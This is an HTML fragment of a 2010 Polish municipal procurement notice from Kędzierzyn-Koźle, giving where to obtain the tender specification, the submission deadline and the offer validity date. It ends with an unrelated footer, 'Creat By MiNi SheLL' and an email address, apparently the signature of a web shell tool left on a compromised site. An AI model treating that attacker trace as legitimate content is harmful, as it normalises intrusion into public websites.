<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kedzierzynkozle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kędzierzyn-Koźle ul.Piramowicza 20 pokój 207 w cenie 14 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2010 godzina 11:00, miejsce: Kędzierzyn-Koźle ul.Piramowicza 20 pokój 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.05.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com